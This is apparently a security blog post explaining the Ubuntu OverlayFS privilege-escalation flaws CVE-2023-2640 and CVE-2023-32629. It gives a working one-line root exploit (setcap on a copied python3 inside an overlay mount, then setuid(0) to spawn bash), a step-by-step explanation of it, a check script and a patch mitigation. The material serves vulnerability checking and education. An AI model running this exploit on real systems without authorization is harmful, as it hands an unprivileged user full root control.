Ubuntu GameOver(lay) Local Privilege Escalation CVE-2023-32629 and CVE-2023-2640
The vulnerabilities CVE-2023-32629 and CVE-2023-2640 were both discovered in the Ubuntu kernel's OverlayFS module. This post gives a simple PoC to check whether your Ubuntu system is vulnerable, and explains how to fix it.
CVE-2023-2640
This vulnerability affects specific Ubuntu kernels that permit an unprivileged user to set privileged extended attributes on mounted files without the proper security checks. An unprivileged user can set privileged extended attributes on files in the overlay mount, and these attributes are then set on the upper files without the appropriate security checks, which can lead to unauthorized access or other unspecified impacts.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2023-2640
CVE-2023-32629
This is a local privilege escalation vulnerability that skips permission checks when performing certain operations on Ubuntu kernels. More specifically, the flaw is in the OverlayFS ovl_copy_up_meta_inode_data function, where permission checks are skipped when calling ovl_do_setxattr on Ubuntu kernels.
Reference:
https://www.tenable.com/cve/CVE-2023-32629
https://access.redhat.com/security/cve/CVE-2023-32629
Impact
Both vulnerabilities enable a local privilege escalation, where an unprivileged user can gain elevated privileges on the system. This is a serious issue as it allows attackers with basic access to escalate their privileges to a root level, gaining full control over the affected system.
POC
Payload
To check whether the Ubuntu system supports or is currently running OverlayFS:
# Check if the module is loaded
lsmod | grep overlay
# Check if the module is available
modinfo overlay
# Check the filesystem type of current mounts
mount | grep overlay
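The three checks above can be gathered into one pre-flight script. This is an added example, not the original post's code: it reads /proc/modules and /proc/mounts directly instead of piping through grep (so a mount whose options merely contain the word "overlay" is not miscounted), and it additionally reports whether unprivileged user namespaces are permitted, since the unshare -r step of the payload (explained below) depends on them. The kernel.unprivileged_userns_clone sysctl path is Ubuntu-specific; all paths can be overridden for testing.

```sh
#!/bin/sh
# Pre-flight check for the conditions the PoC above relies on. Added example,
# not the original post's code. Every path defaults to the live system but can
# be passed as $1 so the parsing logic can be exercised on constructed data.

# Exit 0 if the overlay module is listed in a /proc/modules-style file.
overlay_module_loaded() {
    grep -q '^overlay ' "${1:-/proc/modules}" 2>/dev/null
}

# Print the number of overlay mounts in a /proc/mounts-style file. Field 3 is
# the filesystem type, so this does not match on "overlay" inside option strings.
count_overlay_mounts() {
    f="${1:-/proc/mounts}"
    [ -r "$f" ] || { echo 0; return; }
    awk '$3 == "overlay" { n++ } END { print n + 0 }' "$f"
}

# Exit 0 if unprivileged user namespaces are permitted; `unshare -r` needs them.
# Ubuntu exposes the kernel.unprivileged_userns_clone sysctl; when the knob is
# absent, mainline kernels permit unprivileged user namespaces by default.
unpriv_userns_allowed() {
    f="${1:-/proc/sys/kernel/unprivileged_userns_clone}"
    [ -r "$f" ] || return 0
    [ "$(cat "$f")" = "1" ]
}

# Constructed /proc/mounts excerpt (not captured from a real host) to show the
# parser only counts entries whose type is overlay.
demo="$(mktemp)"
cat > "$demo" <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
overlay /merged overlay rw,lowerdir=/l,upperdir=/u,workdir=/w 0 0
tmpfs /run tmpfs rw,nosuid,nodev 0 0
EOF
echo "demo: overlay mounts in constructed sample = $(count_overlay_mounts "$demo")"
rm -f "$demo"

# Live report for this host. Compare the kernel version with the fixed
# versions in Ubuntu's advisory for these CVEs.
echo "kernel: $(uname -r)"
if overlay_module_loaded; then echo "overlay module: loaded"
elif modinfo overlay >/dev/null 2>&1; then echo "overlay module: available, not loaded"
else echo "overlay module: not available"; fi
echo "overlay mounts: $(count_overlay_mounts)"
if unpriv_userns_allowed; then echo "unprivileged user namespaces: allowed"
else echo "unprivileged user namespaces: disabled"; fi
```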
# Make sure you run this payload as a lower-privileged user; you may change /bin/bash to another command.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
Payload Explanation
unshare -rm
- unshare is a command that runs a program in new namespaces. A namespace is a Linux kernel feature that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees a different, isolated set.
- The -r option creates a new user namespace and maps the current user to root inside it.
- The -m option creates a new mount namespace, so any mounts made inside it are not visible to processes outside it.
sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
- This invokes a new shell, sh, to execute the command string provided after -c.
- mkdir l u w m creates four directories named l, u, w and m.
- cp /u*/b*/p*3 l/ copies the Python3 binary (matched by the glob pattern /u*/b*/p*3) into the l directory.
setcap cap_setuid+eip l/python3;
- setcap is used to set capabilities on binaries. cap_setuid allows the binary to change its UID (user identifier). +eip marks the capability as effective, inheritable and permitted.
- This command grants the python3 binary in the l directory the ability to change its user ID, effectively allowing it to become any user, including root.
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m
- This mounts an overlay filesystem. Overlay filesystems let you overlay one directory (called the upper directory) on top of another (called the lower directory).
- Here, it overlays the directory u over l, using w as the work directory, and mounts the resulting filesystem at m.
touch m/*
- This runs touch on every file in the m directory; touch creates a file if it does not exist and otherwise updates its timestamps, so every file in the merged view is modified.
u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
- After the sh command sequence completes, this runs a Python3 command from the u directory. os.setuid(0) sets the user ID of the current process to 0, which is the UID of root. Because the Python3 binary has been granted the cap_setuid capability, it can change its UID to root. os.system("/bin/bash") then starts a new bash shell; since the process's user ID was just set to root, this shell runs with root privileges.
Payload reference:
https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
Mitigation
Update the Ubuntu kernel to a patched version.